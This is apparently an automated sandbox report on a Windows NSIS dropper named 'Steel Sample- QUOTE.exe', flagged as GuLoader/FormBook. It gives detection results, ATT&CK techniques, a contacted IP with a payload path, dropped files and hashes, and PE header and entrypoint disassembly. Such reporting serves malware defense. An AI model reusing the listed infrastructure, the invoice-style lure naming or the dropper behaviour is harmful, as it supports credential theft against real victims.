            Source: Yara matchFile source: 00000012.00000002.2964847255.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.3341106363.0000000036E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2964739625.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2964626789.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3334791742.0000000035560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2964789257.00000000030C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2964847255.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		112
            Process Injection            		11
            Masquerading            		OS Credential Dumping211
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		112
            Process Injection            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol1
            Clipboard Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information            		Security Account Manager3
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
            Obfuscated Files or Information            		NTDS23
            System Information Discovery            		Distributed Component Object ModelInput Capture11
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Steel Sample- QUOTE.exe24%VirustotalBrowse
            Steel Sample- QUOTE.exe29%ReversingLabsWin32.Trojan.Guloader

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsf64C1.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://196.251.86.79/R0%Avira URL Cloudsafe
            http://196.251.86.79/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdSteel Sample- QUOTE.exe, 00000006.00000001.2207372084.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
              		high
              http://www.ftp.ftp://ftp.gopher.Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                		high
                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdSteel Sample- QUOTE.exe, 00000006.00000001.2207372084.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                  		high
                  http://nsis.sf.net/NSIS_ErrorErrorSteel Sample- QUOTE.exefalse
                    		high
                    http://196.251.86.79/Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005044000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://196.251.86.79/RSteel Sample- QUOTE.exe, 00000006.00000002.3297486628.0000000005056000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518545441.0000000005054000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518463210.0000000005054000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      196.251.86.79
                      		unknownSeychelles
                      		37417SONIC-WirelessZAfalse

                      General Information

                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1629363
                      Start date and time:2025-03-04 16:52:22 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 37s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:15
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:4
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Steel Sample- QUOTE.exe
                      Detection:MAL
                      Classification:mal80.troj.evad.winEXE@3/9@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 90%
                      • Number of executed functions: 53
                      • Number of non-executed functions: 258
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.253.72, 20.190.160.66, 20.223.36.55, 2.19.122.66
                      • Excluded domains from analysis (whitelisted): www.bing.com, d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      10:53:16API Interceptor4371x Sleep call for process: Steel Sample- QUOTE.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      196.251.86.79RFQ for electrical cables.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 196.251.86.79/VvxYZQIpjXvSyt238.bin
                      RFQ for electrical cables.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 196.251.86.79/VvxYZQIpjXvSyt238.bin

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      SONIC-WirelessZAPO 352995.exeGet hashmaliciousAgentTeslaBrowse
                      • 196.251.83.222
                      PO24S1458(SEQ 2).com.exeGet hashmaliciousAgentTeslaBrowse
                      • 196.251.83.222
                      pp.dd.exeGet hashmaliciousUnknownBrowse
                      • 196.251.83.195
                      Asco Valve Shanghai OrderPO-011024.exeGet hashmaliciousAgentTeslaBrowse
                      • 196.251.83.222
                      x86_64.elfGet hashmaliciousUnknownBrowse
                      • 196.251.84.214
                      PO IC-0860.exeGet hashmaliciousAgentTeslaBrowse
                      • 196.251.83.222
                      RFQ for electrical cables.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 196.251.86.79
                      RFQ for electrical cables.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 196.251.86.79
                      file_1.exeGet hashmaliciousLokibotBrowse
                      • 196.251.84.43
                      bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                      • 196.251.84.254

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Temp\nsf64C1.tmp\System.dllSkambenets.exeGet hashmaliciousGuLoaderBrowse
                        Skambenets.exeGet hashmaliciousGuLoaderBrowse
                          Marcom Trade SS-04665.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                              SecuriteInfo.com.FileRepMalware.23885.29286.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                SecuriteInfo.com.FileRepMalware.24375.4894.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  OqqrLiFWKC.exeGet hashmaliciousMindsparkBrowse
                                    Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      EL GINER.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        u9aPQQIwhj.exeGet hashmaliciousAgentTesla, GuLoaderBrowse

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\nsf64C1.tmp\System.dll

                                          Download File
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):11264
                                          Entropy (8bit):5.813979271513012
                                          Encrypted:false
                                          SSDEEP:192:eF2HS5ih/7i00dWz9T7PH6lOFcQMI5+Vw+bPFomi7dJWsP:rSUmlw9T7DmnI5+N273FP
                                          MD5:7399323923E3946FE9140132AC388132
                                          SHA1:728257D06C452449B1241769B459F091AABCFFC5
                                          SHA-256:5A1C20A3E2E2EB182976977669F2C5D9F3104477E98F74D69D2434E79B92FDC3
                                          SHA-512:D6F28BA761351F374AE007C780BE27758AEA7B9F998E2A88A542EEDE459D18700ADFFE71ABCB52B8A8C00695EFB7CCC280175B5EEB57CA9A645542EDFABB64F1
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: Skambenets.exe, Detection: malicious, Browse
                                          • Filename: Skambenets.exe, Detection: malicious, Browse
                                          • Filename: Marcom Trade SS-04665.exe, Detection: malicious, Browse
                                          • Filename: Hermaean.exe, Detection: malicious, Browse
                                          • Filename: SecuriteInfo.com.FileRepMalware.23885.29286.exe, Detection: malicious, Browse
                                          • Filename: SecuriteInfo.com.FileRepMalware.24375.4894.exe, Detection: malicious, Browse
                                          • Filename: OqqrLiFWKC.exe, Detection: malicious, Browse
                                          • Filename: Factura Honorarios 2024-11-04.exe, Detection: malicious, Browse
                                          • Filename: EL GINER.exe, Detection: malicious, Browse
                                          • Filename: u9aPQQIwhj.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....f.R...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..B....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\nsr4244.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1141552
                                          Entropy (8bit):4.404419158259776
                                          Encrypted:false
                                          SSDEEP:6144:JTrjHJ/zZYyWryWvV5L9j/ppkYWTU2JHPLiYKOeXYDcPxMnpfRdlLV2/eMUsM3CJ:JTrjpifhV5RpWTRJvzxcyUdQ+
                                          MD5:6C255940C78E0967FFE11DF8CAD9E25C
                                          SHA1:E290A32D2FD0D7F30C7074154B7027BDF994CA7D
                                          SHA-256:5AD9A6A963DBF9F9B9EFB3E4FB73FB5FBB54F3FAB68CB1A535E24F6F95799EDC
                                          SHA-512:4F782495B85FD33A6FAEE6C32E0F5935A1C0991834B5133279E7B1C5700783E75A8BC28A64AFFE1BFFC56189DA374C2CC8CB21FF5974CBF00FBDB08A071012A6
                                          Malicious:false
                                          Reputation:low
                                          Preview:.7......,.......,.......D...n...L........6.......7..........................n...............................................................................................................................................................................................................G...\...........'...j...............................................................................................................................g...............................................................h...........................................................................6...)...E...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Roaming\Rigsantikvarernes\Kaldsekvensens123\pray.kry

                                          Download File
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):70351
                                          Entropy (8bit):1.2598388117953725
                                          Encrypted:false
                                          SSDEEP:384:M37raR0TFnugVoTVnb93oEZw78Ih/izqcxB3S4Y:O3aR0TQgeTlNPwYIUzq6B3Sp
                                          MD5:54E646BCD4B09075BE0D4ECE1ED62685
                                          SHA1:17A4525BC6FCEEA6B1A92536D23749E11619E96C
                                          SHA-256:D34CC96D389EDFAC6047EB41DC22EAA9A5EA26A64A36EB733BC95FC4ED570E72
                                          SHA-512:04A0B74320AD2131AE0113D35B5AF2CF3D76A81D560E46A7EB65C7C45FE907103F4B55645585E1632C5D691152DD536D9456FEB5954F26E91ECE11F595605DF1
                                          Malicious:false
                                          Reputation:low
                                          Preview:.................................................................................................A......................................L..................................................e...b......................................._....................................................................f.............0....{................................................P...............................<......t....................................................L........~...e.............................v.............V.........................#...............................@......\.............................@...............................................F..............].........................H..............................................................,..s=.........W.........g..............................................................m...................................................j...................................\.........................................Q........L.........

                                          C:\Users\user\AppData\Roaming\Rigsantikvarernes\Kaldsekvensens123\respirationsstoppene.txt

                                          Download File
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):661
                                          Entropy (8bit):4.502730296156622
                                          Encrypted:false
                                          SSDEEP:12:/Hi8sSTbFHPjdTJYQT44hR+ZgM0R3RIkWxz4dX6NOW1m4QwT2TbFTD2MoyEnV:/H+WPBT69rC5Qz+6N9rP2PFPo5
                                          MD5:04CE2396C7300E78E16AA6A3E1050BF4
                                          SHA1:E0E3BE532ECD63E46C149751EB546752123F68BE
                                          SHA-256:1B746C6A7D78152EFC91E1B7107E1EE013249ECC45023FA52D9022446BAF4224
                                          SHA-512:B53DB842727156076DEB0345F506260A6A717C81411209B39BB99774D6862508DE95427078975FAC8220396B117469E30077D874B112AE8E8BCC3119B245FBFB
                                          Malicious:false
                                          Preview:Kurfyrsten tillgsbevillingens rdnet bleakness,achromobacter pseudoparasitism cytherella..redlined nordstjernen htel koorka hovedsalaterne sjlegruppers.Gazette borgerreprsentanten nullify hegelianer unsystemisables preintelligent eklektiker materialprvninger..spillable aktivitetscentret bremsens indflyvningernes interpenetrative.Dull politistyrkers plainclothesmen observantist..[FORGIFTNINGERNE KILOMETRES]..;cartesian legislation havgus zirbanit anmasselses divorceuse.Grnttrrings kontiene lumens paaholdende ondograph stib..Svinemiklernes dumbest prelunch svaleurter allegorisk visitkortets afmagnetiseringernes,knstte assimilationer forgaber differenciel..

                                          C:\Users\user\AppData\Roaming\Rigsantikvarernes\Negrillo162.nov

                                          Download File
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):284577
                                          Entropy (8bit):1.255078923587751
                                          Encrypted:false
                                          SSDEEP:6144:kMnpfRdlLV2/eMUsM3C7WcXAj8iJIRpofbRYAUpOYPJLL8DStXMkO6nsCm:lx
                                          MD5:E19CE796159C3BDE707DD283EC175450
                                          SHA1:EFC8FA6D949A4939A01D9C380F6946AA311AA584
                                          SHA-256:F742C0F0F0B306BBA3C99E7B3CBF13D8197AFA3DC8A26DEBCED77D894103A7A7
                                          SHA-512:84D6AA4A917C94CC4E17EBE4DCA6A8D2BC1AEB81D313EB7F07980D3CCBFF6134007CB7ECC3B9ABC00F0510AECD26E92AEE0634A1084813A18ACDD70E3952E9F4
                                          Malicious:false
                                          Preview:....................&...................b...........Md........!................................................................+........................................................................................(....a................................3......................q.....................................[...................r.........,.........................Q........................................................+...........................................................................................`..Z..........+.......*............y2......................................&............................................Z..........................................+.....................................................S.........J....................................................................z....<..............................................y......................C...........................Y........P...........*..........................

                                          C:\Users\user\AppData\Roaming\Rigsantikvarernes\Zaberma.Shi

                                          Download File
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):285946
                                          Entropy (8bit):7.657721144415451
                                          Encrypted:false
                                          SSDEEP:6144:HJ/zZYyWryWvV5L9j/ppkYWTU2JHPLiYKOeXYDcPW:pifhV5RpWTRJvzxcO
                                          MD5:17FFB7B765458A95D6E300F16EB13389
                                          SHA1:2911EE51EE590831055CC532031295F8217E1B9D
                                          SHA-256:5261CEA7E23C31DB066EE439670CAFE8407621531697680F1B1993093A340E9B
                                          SHA-512:3A51D266601DDF94DF20E392B9EBD68FB7C024ABB1BEAF2C1B5C60694EAFDFF64586F4870245F86CCD52C3047ED03AFACEEE372C883D5FDF5B3C5F3FFEBFB645
                                          Malicious:false
                                          Preview:..&...................(..EE..................................U........r....//............QQQ......uu...RRR......[[[...........l....MM..7........................c.........................d..............333..........V.......^...<<..............444................\................M.........................".5........................'...............&&........`.................JJJJ......z......]..ZZ.................II..`.kk..................99...............88.....\...0.....b.....$$.........+.Q..9.........99999..................................................%............C.*....W...........ww.;...............a......"............|.x.....{...}}..E...............e...9....2.11.)..G..............................CC...;;...e...........1.............................{{{{....555.v........L..KK.---..........bb.$................................EE....*...........w.''............\.666.````````......gg..........k..MM.%........rrr.............|..rrrrrrrrr.^^.....ll........................5.....TTT........

                                          C:\Users\user\AppData\Roaming\Rigsantikvarernes\anticipatively.ini

                                          Download File
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):667
                                          Entropy (8bit):4.5176817284957815
                                          Encrypted:false
                                          SSDEEP:12:3vOruGoCjuWKfHb8aMt+JX4yESglsw1kKKh6BgOxuFlsFOsSsv:3bCUfnOCIZHGs0e
                                          MD5:6C74C3D34F8CC5E305E5085FF917D020
                                          SHA1:20773526DBD9495B5E6D11E9B2AF205C81B49CC1
                                          SHA-256:1A953DC54649B2E6ED53F12C1B1AED83493E75C2068D3DB8206A87A0D1215E83
                                          SHA-512:C7C7A68E64E151FD7AE069AA475CD1E0FC37C4C9251231CC73EA4B9EEFBB0EA3FFC65DC11BE8CF8D5FBCF270CCA12F658C23ABA5682DBAE87051515C080D7DF0
                                          Malicious:false
                                          Preview:[REOLPLJEDE ENAMELWARE]..ephestian sexologs kabelfejl forflytninger tidsrammen nonrevoltingly heptarchical geochemist lustre inoffensively gasometre.Bordeauxrdt ttheden trainable kautioneringer voksenbillet driftsbidragene ankesag osteriets..motionlessly crewing kluntekroer festrusen obducenten.Tetrabasic tilbagekaldelsesgrundes afskallingen guilds widenesses aquinist..;federaliseringens underskudsforretningerne halvmaskers filmiest,indskuddenes serne beslaas sortskjortens..Telefonautomats jernbaneforbindelse lustless appomattoc hovmestre turio..gemma encyclic ere americanize gaslighterne.Philologists breblger cheroots modtages metallisk constrains yashmaks..

                                          C:\Users\user\AppData\Roaming\Rigsantikvarernes\folketingsformand.txt

                                          Download File
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):530
                                          Entropy (8bit):4.431710325153932
                                          Encrypted:false
                                          SSDEEP:12:4/k2m2UmKg9FKgDq+0G/UerFEJ6T9lfLfWqpTk+Nt7MZ:rdrmP930G/PFEJqrfFO+nIZ
                                          MD5:8A7A9974B9C55BF8AC94710B477A662E
                                          SHA1:B7D0D00BB0FDFBC172B92C62464768CA630EB0C3
                                          SHA-256:7C448A6C8E8DE6460AC05834DE6F9042467ACDA9FFD9923352C42F2904C59782
                                          SHA-512:B14074DD2E2255D106F18508649F38B3C30EF20CF5AAB8144A5E7EF22ADF329A3FE18A4B4D136A43F6E9C4ACB4CD0336672B1AC01384EA299C1382B211EFC4B0
                                          Malicious:false
                                          Preview:atlas eftersmkket skibspapiret uncollectibly alarmsignals.Haematein inddatafelters parapsychologists guide doubleness..[solus anisophyllous]..;invisibly generindret coralene landemrke seringas brahmanhood unbreathable.Pressmanship encephalitic skrkslagent fyrmestres midtpunktsjusteringers swingometer allelopathy..;serges forbundsformnd delikatessehandlerens ascogonia.Atomfysikers incitament gynantherous thumlungur velrenommeret decentralises changements........Rehydrating udhvilede kalkbrnder vedligeholdets knotty besvimer..

                                          C:\Users\user\AppData\Roaming\Rigsantikvarernes\levnedsmiddelets.sva

                                          Download File
                                          Process:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):473258
                                          Entropy (8bit):1.248788570764183
                                          Encrypted:false
                                          SSDEEP:1536:cSG9iToxeAQXFzDmk6As6vQRMWHzm2OhzdipTMhKxPY+oi6ZeJ5Ejq2pYMm1C/i+:QcxsNNd4FOITURiN
                                          MD5:336BDDA1E77424F8F50C8FF0AA64D146
                                          SHA1:5E475F772C80DDB47E3CEC3F181DC493D2C6D60D
                                          SHA-256:E7D5C4A66EAD0A6935C952CB287E6839BB68A44A1C8508C88CC5EC9AE4411D01
                                          SHA-512:3FBF475C651B94CCD5E645216864D264E032D6B5122B3759B1E78D606B24163395141DAE76F2362F413E313C4232DD4D2C884D4D6ED1BC3564781191CF125C8C
                                          Malicious:false
                                          Preview:..........h...........................................B.u........................p...............-.......................................j.........................................I............................0...V............4..........#.................................+.....................9............................................5...................................................................`......................................T....Z..................................................................!...............................................3........K............W.`.....................v...................5....................................................................n.........2..................../......?.....................................................)............p.....................{...........,...................gy.....................g...T.............4................o.............2.........................).......#...........[...

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.25573160508065
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Steel Sample- QUOTE.exe
                                          File size:684'504 bytes
                                          MD5:1a0611d6fad6a80c0369a33c2e09f52a
                                          SHA1:a66e801bc37c50f675fa9f98864caf292052900d
                                          SHA256:1d9fbcb6a4f1688a020b56a5d82e29498f8b2c22c6e6c04bdf1ffcbfd80b65da
                                          SHA512:03bfde30674f4dfbbe038fa21c321aaea0c84ba2fce73d6cec21d2c41bc9bdf1caa2901172726fce0ebe0a7e7da4f11f1e9db3fc03983b93246ae3987f7fc0d7
                                          SSDEEP:12288:tt4DeGwb/LMHdFZh/b/GrVhG5OiE7mfMVvC+KcubvQ:CPwD4dFZh/TGrVhAO//vC+K77
                                          TLSH:A9E412487FE9D837C31218744E60EA6CBBFABE444C118F473B5D3FAEAD32A5558051A8
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@

                                          File Icon

                                          Icon Hash:0d0e1f1d1b874f0c

                                          Static PE Info

                                          General

                                          Entrypoint:0x403358
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:e221f4f7d36469d53810a4b5f9fc8966

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 000002D4h
                                          push ebx
                                          push ebp
                                          push esi
                                          push edi
                                          push 00000020h
                                          xor ebp, ebp
                                          pop esi
                                          mov dword ptr [esp+14h], ebp
                                          mov dword ptr [esp+10h], 00409230h
                                          mov dword ptr [esp+1Ch], ebp
                                          call dword ptr [00407034h]
                                          push 00008001h
                                          call dword ptr [004070BCh]
                                          push ebp
                                          call dword ptr [004072ACh]
                                          push 00000008h
                                          mov dword ptr [00429298h], eax
                                          call 00007FCEA8B3F19Ch
                                          mov dword ptr [004291E4h], eax
                                          push ebp
                                          lea eax, dword ptr [esp+34h]
                                          push 000002B4h
                                          push eax
                                          push ebp
                                          push 00420690h
                                          call dword ptr [0040717Ch]
                                          push 0040937Ch
                                          push 004281E0h
                                          call 00007FCEA8B3EE07h
                                          call dword ptr [00407134h]
                                          mov ebx, 00434000h
                                          push eax
                                          push ebx
                                          call 00007FCEA8B3EDF5h
                                          push ebp
                                          call dword ptr [0040710Ch]
                                          cmp word ptr [00434000h], 0022h
                                          mov dword ptr [004291E0h], eax
                                          mov eax, ebx
                                          jne 00007FCEA8B3C2EAh
                                          push 00000022h
                                          mov eax, 00434002h
                                          pop esi
                                          push esi
                                          push eax
                                          call 00007FCEA8B3E846h
                                          push eax
                                          call dword ptr [00407240h]
                                          mov dword ptr [esp+18h], eax
                                          jmp 00007FCEA8B3C3AEh
                                          push 00000020h
                                          pop edx
                                          cmp cx, dx
                                          jne 00007FCEA8B3C2E9h
                                          inc eax
                                          inc eax
                                          cmp word ptr [eax], dx
                                          je 00007FCEA8B3C2DBh
                                          add word ptr [eax], 0000h

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x3b330.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x5e660x6000e8f12472e91b02deb619070e6ee7f1f4False0.6566569010416666data6.419409887460116IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x202d80x600a5ec1b720d350c6303a7aba8d85072bfFalse0.4733072916666667data3.7600484096214832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x2a0000x260000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x500000x3b3300x3b4002d2028b91a53c942835f80f84c194200False0.5409620582805907data5.258649495088397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_BITMAP0x504780x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                          RT_ICON0x507e00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.3344522654678812
